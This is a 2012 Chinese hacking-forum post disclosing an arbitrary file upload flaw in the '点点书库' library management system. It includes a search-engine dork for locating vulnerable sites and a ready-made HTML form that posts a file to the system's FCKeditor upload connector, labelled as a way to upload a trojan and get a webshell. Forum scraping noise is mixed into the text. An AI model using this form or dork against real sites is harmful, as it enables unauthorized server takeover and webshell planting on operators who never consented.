找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 7440|回复: 0
打印 上一主题 下一主题

点点书库图书馆系统文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:20:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
主题:图书馆系统任意文件上传漏洞2 u7 [  _- H, W# ~- Q' F1 L- u& o1 ~1 d
作者:冰锋刺客+ o  a, K$ {8 a1 d3 e0 K
厂商:点击书(dianjishu.com)
5 J/ q, K$ x/ c/ V$ E 日期:2012-6-21
4 J2 P+ {3 H- _& @! j! E! |
4 u& R! [+ t& o7 Z7 oI 概述
  I! S. J" u+ x! x. T   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell7 L8 J; r, L# Q3 d, X' W
II 简介# ?1 ~7 _- N( \* P
   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
) c. Z/ Z3 W- g8 [1 O 补充一个漏洞$ q; ^. ?3 r$ Z& L- H
<form id="frmUpload" enctype="multipart/form-data"+ P/ ~5 \" h  {
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>" p! K- ~1 ~0 Y& J6 R% v
<input id="btnUpload" type="submit" value="操翻他">& d& q: V6 Q9 l$ @$ h0 e
</form>. M  b8 E8 _: H: s  F* R( M7 t- ]
你们懂的
' ?8 u% `9 j$ w 那傻逼提供还需要改包.* |' a8 u. E4 f: ]8 k
自己看了下源代码发现fckeditor
7 ~& Q4 v0 K+ l9 x 直接秒杀
! n& T$ w6 B) W2 a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表